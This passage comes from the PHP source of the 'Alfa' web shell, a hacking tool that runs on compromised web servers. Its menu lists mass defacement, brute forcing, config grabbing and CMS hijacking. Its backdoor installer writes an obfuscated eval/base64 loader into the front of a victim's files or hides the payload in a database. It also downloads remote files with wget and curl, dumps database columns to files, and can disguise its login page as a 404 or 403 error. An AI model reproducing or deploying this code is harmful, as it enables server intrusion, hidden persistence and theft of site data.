  1194. 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
  1195. 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
  1196. 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','selfrm'=>'Remove Shell'
  1197. );
  1198. foreach($li as $key=>$value){
  1199. echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
  1200. }
  1201. echo '</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path='.$GLOBALS['cwd'].'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=settings\';g(\'settings\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">Delves Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path='.$GLOBALS['cwd'].'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=market\';g(\'market\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path='.$GLOBALS['cwd'].'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt=aboutus\';g(\'aboutus\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">About Us</a>'.(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']) ? '<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>':'').'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="'.$GLOBALS['cwd'].'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\'/\',1);">New Tab +</div></div>';}else{
  1202. @error_reporting(E_ALL ^ E_NOTICE);
  1203. @ini_set('error_log',NULL);
  1204. @ini_set('log_errors',0);
  1205. @ini_set('max_execution_time',0);
  1206. @ini_set('magic_quotes_runtime', 0);
  1207. @set_time_limit(0);
  1208. }}
  1209. function alfalogout(){
  1210. @setcookie("AlfaUser", null, 2012);
  1211. @setcookie("AlfaPass", null, 2012);
  1212. unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
  1213. echo("ok");
  1214. }
  1215. function showAnimation($name){
  1216. return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
  1217. }
  1218. function __showicon($r){
  1219. $s['btn']='http://haxor.lol/love/heads.png';
  1220. $s['alfamini']='https://haxor.lol/love/heads.png';
  1221. $s['loader']='https://i.imgur.com/7aRsK2p.png';
  1222. //return 'data:image/png;base64,'.__get_resource($s[$r]);
  1223. return $s[$r];
  1224. }
  1225. function alfainbackdoor(){
  1226. alfahead();
  1227. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
  1228. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
  1229. $success= '<font color="green">Success...!';
  1230. $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
  1231. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
  1232. $cwd = 'Example: /home/alfa/public_html/index.php';
  1233. if($_POST['alfa1']=='file'){
  1234. echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
  1235. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
  1236. $method = $_POST['alfa2'];
  1237. $file = $_POST['alfa3'];
  1238. $shell = $_POST['alfa4'];
  1239. $key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
  1240. if($key=='')$key='alfa';
  1241. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  1242. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
  1243. if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
  1244. if($_POST['alfa1']=='db'){
  1245. echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
  1246. $table = array('td1' =>
  1247. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  1248. 'td2' =>
  1249. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  1250. 'td3' =>
  1251. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  1252. 'td4' =>
  1253. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  1254. 'td5' =>
  1255. array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
  1256. 'td6' =>
  1257. array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
  1258. );
  1259. create_table($table);
  1260. echo("<p>{$select}</p>");
  1261. echo($textarea);
  1262. echo("<p><input type='submit' value=' '></p></form></p></center>");
  1263. if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
  1264. $dbhost = $_POST['alfa2'];
  1265. $dbuser = $_POST['alfa3'];
  1266. $dbpw = $_POST['alfa4'];
  1267. $dbname = $_POST['alfa5'];
  1268. $file = $_POST['alfa6'];
  1269. $method = $_POST['alfa7'];
  1270. $shell = $_POST['alfa8'];
  1271. $key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
  1272. if($key=='')$key='alfa';
  1273. if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
  1274. if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
  1275. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
  1276. if(@is_file($file)&&@is_writable($file)){
  1277. @mysqli_query($conn,'DROP TABLE `alfa_bc`');
  1278. @mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
  1279. @mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
  1280. @file_put_contents($file,$code."\n".@file_get_contents($file));
  1281. __alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
  1282. echo('</div>');
  1283. alfafooter();
  1284. }
  1285. function alfawhois(){
  1286. echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
  1287. if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
  1288. $site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
  1289. $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
  1290. $data = @file_get_contents($target);
  1291. if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
  1292. $target = @json_decode($data,true);
  1293. echo __pre();
  1294. if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
  1295. echo("</div>");
  1296. }
  1297. function alfaremotedl(){
  1298. alfahead();
  1299. echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
  1300. <form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
  1301. <p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p>
  1302. <div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
  1303. </form></p></center>");
  1304. if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
  1305. echo __pre();
  1306. $url = $_POST['alfa1'];
  1307. $path = $_POST['alfa2'];
  1308. echo('<center>');
  1309. if(__download($url,$path)){
  1310. echo('<font color="green">Success...!</font>');
  1311. }else{
  1312. echo('<font color="red">Error...!</font>');
  1313. }
  1314. echo('</center>');
  1315. }
  1316. echo("</div>");
  1317. alfafooter();
  1318. }
  1319. function __download($url,$path=false){
  1320. if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
  1321. $saveas = basename(rawurldecode($url));
  1322. if($path){$saveas=$path.$saveas;}
  1323. if($content = __read_file($url)){
  1324. if(@is_file($saveas))@unlink($saveas);
  1325. if(__write_file($saveas, $content)){return true;}}
  1326. $buff = alfaEx("wget ".$url." -O ".$saveas);
  1327. if(@is_file($saveas)) return true;
  1328. $buff = alfaEx("curl ".$url." -o ".$saveas);
  1329. if(@is_file($saveas)) return true;
  1330. $buff = alfaEx("lwp-download ".$url." ".$saveas);
  1331. if(@is_file($saveas)) return true;
  1332. $buff = alfaEx("lynx -source ".$url." > ".$saveas);
  1333. if(@is_file($saveas)) return true;
  1334. $buff = alfaEx("GET ".$url." > ".$saveas);
  1335. if(@is_file($saveas)) return true;
  1336. $buff = alfaEx("links -source ".$url." > ".$saveas);
  1337. if(@is_file($saveas)) return true;
  1338. $buff = alfaEx("fetch -o ".$saveas." -p ".$url);
  1339. if(@is_file($saveas)) return true;
  1340. return false;
  1341. }
  1342. function clean_string($string){
  1343. if(function_exists("iconv")){
  1344. $s = trim($string);
  1345. $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
  1346. }
  1347. return $s;
  1348. }
  1349. function __read_file($file, $boom = true){
  1350. $content = false;
  1351. if($fh = @fopen($file, "rb")){
  1352. $content = "";
  1353. while(!feof($fh)){
  1354. $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
  1355. }
  1356. @fclose($fh);
  1357. }
  1358. if(empty($content)||!$content){
  1359. $content = alfaEx("cat '".addslashes($file)."'");
  1360. }
  1361. return $content;
  1362. }
  1363. function alfaMarket(){
  1364. echo "<div class='header'>";
  1365. $curl = new AlfaCURL();
  1366. $content = $curl->Send("http://solevisible.com/market.php");
  1367. $data = @json_decode($content, true);
  1368. if(!empty($data)){
  1369. if($data["status"] == "open"){
  1370. echo $data["content"];
  1371. }else{
  1372. echo $data["error_msg"];
  1373. }
  1374. }else{
  1375. echo "<div style='text-align:center;font-size:20px;'>Cant connect to the alfa market....! try later.</div>";
  1376. }
  1377. echo "</div>";
  1378. }
  1379. function alfaSettings(){
  1380. alfahead();
  1381. AlfaNum(6,7,8,9,10);
  1382. echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a></h3></center>';
  1383. if($_POST["alfa8"] == "main"){
  1384. echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
  1385. $lg_array = array('0'=>'No','1'=>'Yes');
  1386. $penc_array = array('false'=>'No','true'=>'Yes');
  1387. $protect_html = "";
  1388. $icon_html = "";
  1389. $postEnc_html = "";
  1390. $login_html = "";
  1391. $cgiapi_html = "";
  1392. foreach($lg_array as$key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
  1393. foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
  1394. foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
  1395. foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
  1396. $lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
  1397. foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
  1398. echo '';
  1399. echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
  1400. if($_POST['alfa5']=='>>'){
  1401. echo __pre();
  1402. if(!empty($_POST['alfa3'])){
  1403. $protect = $_POST['alfa1'];
  1404. $lgpage = $_POST['alfa2'];
  1405. $username = $_POST['alfa3'];
  1406. $password = md5($_POST['alfa4']);
  1407. $icon = $_POST['alfa6'];
  1408. $post_encrypt = $_POST['alfa7'];
  1409. $cgi_api_val = $_POST['alfa9'];
  1410. @chdir($GLOBALS['home_cwd']);
  1411. $basename = @basename($_SERVER['PHP_SELF']);
  1412. $data = @file_get_contents($basename);
  1413. $user_rand = $GLOBALS["DB_NAME"]["user_rand"];
  1414. $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
  1415. $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
  1416. $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
  1417. $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
  1418. $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
  1419. $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
  1420. $find_user = '/\''.$user_rand.'\'(.*?),/i';
  1421. $find_pw = '/\''.$pass_rand.'\'(.*?),/i';
  1422. $find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
  1423. $find_p = '/\''.$safemode_rand.'\'(.*?),/i';
  1424. $icons = '/\''.$show_icons_rand.'\'(.*?),/i';
  1425. $postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
  1426. $cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
  1427. if(!empty($username)&&preg_match($find_user,$data,$e)){
  1428. $new = '\''.$user_rand.'\' => \''.$username.'\',';
  1429. $data = str_replace($e[0],$new,$data);
  1430. }
  1431. if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
  1432. $new = '\''.$pass_rand.'\' => \''.$password.'\',';
  1433. $data = str_replace($e[0],$new,$data);
  1434. }
  1435. if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
  1436. $new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
  1437. $data = str_replace($e[0],$new,$data);
  1438. }
  1439. if(!empty($find_p)&&preg_match($find_p,$data,$e)){
  1440. $new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
  1441. $data = str_replace($e[0],$new,$data);
  1442. }
  1443. if(preg_match($icons,$data,$e)){
  1444. $new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
  1445. $data = str_replace($e[0],$new,$data);
  1446. }
  1447. if(preg_match($postEnc,$data,$e)){
  1448. $new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
  1449. $data = str_replace($e[0],$new,$data);
  1450. }
  1451. if(preg_match($cgi_api_reg,$data,$e)){
  1452. $new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
  1453. $data = str_replace($e[0],$new,$data);
  1454. }
  1455. if(@file_put_contents($basename,$data)){
  1456. echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
  1457. }else{
  1458. __alert("<span style='color:red;'>File has no edit access...!</span>");
  1459. }
  1460. }else{
  1461. __alert("<span style='color:red;'>UserName is Empty !</span>");
  1462. }
  1463. }
  1464. }elseif($_POST["alfa8"] == "color"){
  1465. echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
  1466. echo '<table border="1"><tbody>';
  1467. $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
  1468. $x = 1;
  1469. foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
  1470. $multi = "";
  1471. if(is_array($value)){
  1472. if(isset($value["multi_selector"])){
  1473. $multi = __ZW5jb2Rlcg(json_encode($value));
  1474. }
  1475. }
  1476. $value = alfa_getColor($key);
  1477. $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
  1478. echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
  1479. }
  1480. echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
  1481. echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
  1482. if($_POST['alfa7']=='export'){
  1483. echo __pre();
  1484. $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
  1485. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  1486. $array = array();
  1487. foreach($glob_colors as $k => $v){
  1488. if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  1489. $v = trim($colors[$k]);
  1490. }else{
  1491. $v = trim(is_array($v)?$v["key_color"]:$v);
  1492. }
  1493. $array[$k] = $v;
  1494. }
  1495. $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
  1496. $config = json_encode($array, JSON_PRETTY_PRINT);
  1497. if(!@file_put_contents($file, $config)){
  1498. echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
  1499. }else{
  1500. echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
  1501. }
  1502. }
  1503. if($_POST['alfa2']=='>>'){
  1504. echo __pre();
  1505. $colors = json_decode($_POST["alfa1"],true);
  1506. $array = "";
  1507. $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
  1508. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
  1509. foreach($glob_colors as $k => $v){if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
  1510. $v = trim($colors[$k]);
  1511. }else{
  1512. $v = trim(is_array($v)?$v["key_color"]:$v);
  1513. }
  1514. $array .= '"'.trim($k).'" => "'.$v.'",';
  1515. }
  1516. @chdir($GLOBALS['home_cwd']);
  1517. $basename = @basename($_SERVER['PHP_SELF']);
  1518. $data = @file_get_contents($basename);
  1519. $color = '/\'color\'(.*?)\),/s';
  1520. if(preg_match($color,$data,$e)){
  1521. $new = "'color' => array(".$array."),";
  1522. $data = str_replace($e[0],$new,$data);
  1523. if(@file_put_contents($basename, $data)){
  1524. echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
  1525. }else{
  1526. echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
  1527. }
  1528. }else{
  1529. echo("<center><p><h3>[-] Error...!</h3></p></center>");
  1530. }
  1531. }
  1532. }
  1533. echo('</div>');
  1534. alfafooter();
  1535. }
  1536. function alfaaboutus(){
  1537. alfahead();
  1538. echo '<div class="header">';
  1539. $news = new AlfaCURL();
  1540. $about_us = $news->Send("http://solevisible.com/aboutus.php");
  1541. if(empty($about_us)){
  1542. $about_us = "<pre><center><img src='http://haxor.lol/love/PJPTEAM-Perfect-Hunter-transformed.png'><br>
  1543. <font color='#FFFFFF'>Shell ReCoded By HaxorWorld (LPH TEAM)</font><br>
  1544. <font color='#00A220'>Contact : haxor@leviathanperfecthunter.com</font><br>
  1545. </center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
  1546. }
  1547. echo __pre().$about_us;
  1548. echo('</div>');
  1549. alfafooter();
  1550. }
  1551. function alfacoldumper(){
  1552. alfahead();
  1553. echo('<div class="header">');
  1554. AlfaNum(8,9,10);
  1555. echo "<center><br><div class='txtfont_header'>| Mysql Column Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"var opt_id=this.getAttribute('opt_id');var delimiter='json';try{if($('dumper-delimiter-type').value == 'delimiter')delimiter=$('dumper-delimiter-input').value}catch(e){};g('coldumper',null,delimiter,JSON.stringify(col_dumper_selected_data[opt_id]),this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); col_dumper_selected_data[opt_id] = {};return false;\"><p>";
  1556. $delimiter = (!empty($_POST['alfa1']) ? $_POST['alfa1'] : '::');
  1557. $selected_data = json_decode($_POST['alfa2'], true);
  1558. $username = ($_POST['alfa3']);
  1559. $password = ($_POST['alfa4']);
  1560. $dbname = ($_POST['alfa5']);
  1561. $dfile = ($_POST['alfa6']);
  1562. $host = ($_POST['alfa7']);
  1563. $table = array('td1' =>
  1564. array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => $host, 'inputSize' => '50'),
  1565. 'td2' =>
  1566. array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => $username, 'inputSize' => '50'),
  1567. 'td3' =>
  1568. array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => $password, 'inputSize' => '50'),
  1569. 'td4' =>
  1570. array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => $dbname, 'inputSize' => '50'),
  1571. 'td5' =>
  1572. array('color' => 'FFFFFF', 'tdName' => 'Output Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']), 'inputSize' => '50')
  1573. );
  1574. create_table($table);
  1575. echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
  1576. $db = false;
  1577. if(!empty($dbname)){
  1578. $db = @mysqli_connect($host, $username, $password, $dbname);
  1579. }
  1580. if(count($selected_data) > 0){
  1581. if($db){
  1582. if(!is_dir($dfile)){
  1583. $dfile = $GLOBALS['cwd'];
  1584. }
  1585. $tbls = "";
  1586. $ext = '.txt';
  1587. if($delimiter == 'json'){
  1588. $ext = '.json';
  1589. }
  1590. foreach ($selected_data as $tbl => $cols) {
  1591. $tables_query = mysqli_query($db, "SELECT ".implode(',', $cols)." FROM $tbl");
  1592. $file_name = $dfile.'/'.$dbname.'.'.$tbl.$ext;
  1593. $fp = fopen($file_name, "w");
  1594. $data = array();
  1595. while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
  1596. if($delimiter == "json"){
  1597. $col_arr = array();
  1598. foreach ($row as $key => $value) {
  1599. if(empty($value)){
  1600. $value = "[empty]";
  1601. }
  1602. $col_arr[$key] = $value;
  1603. }
  1604. $data[$tbl][] = $col_arr;
  1605. }else{
  1606. $data = "";
  1607. foreach ($row as $key => $value) {
  1608. if(empty($value)){
  1609. $value = "[empty]";
  1610. }
  1611. $data .= $value . $delimiter;
  1612. }
  1613. fwrite($fp, $data ."\n");
  1614. }
  1615. }
  1616. if($delimiter == "json"){
  1617. fwrite($fp, json_encode($data));
  1618. }
  1619. fclose($fp);
  1620. $tbls .= "Done ~~~> ".$file_name."<br>";
  1621. }
  1622. echo __pre();
  1623. echo "<center><font color='#00FF00'>".$tbls."</font></center>";
  1624. }
  1625. }
  1626. if(!empty($dbname) && count($selected_data) == 0){
  1627. //echo __pre();
  1628. if($db){
  1629. echo("<hr><div style='text-align:center;margin-bottom:5px;font-weight:bolder;'><span>[ Select your tables and columns for dumping data ]</span></div>");
  1630. echo("<div style='text-align:center;'><span>Output Type: </span><select id='dumper-delimiter-type' onchange='colDumplerSelectType(this);' name='output_type'><option value='delimiter' selected>delimiter</option><option value='json'>json</option></select><div id='coldumper-delimiter-input' style='display:inline;'><span> Delimiter: </span><input id='dumper-delimiter-input' style='text-align:center;' type='text' name='delimiter' placeholder='eg: ,'></div></div>");
  1631. $data = array();
  1632. $tables_query = mysqli_query($db, "SELECT table_name FROM information_schema.tables WHERE table_schema = database();");
  1633. while($row = mysqli_fetch_array($tables_query, MYSQLI_ASSOC)){
  1634. $data[$row["table_name"]] = array();
  1635. $table_count_q = mysqli_query($db, "SELECT count(*) FROM `".$row['table_name']."`");
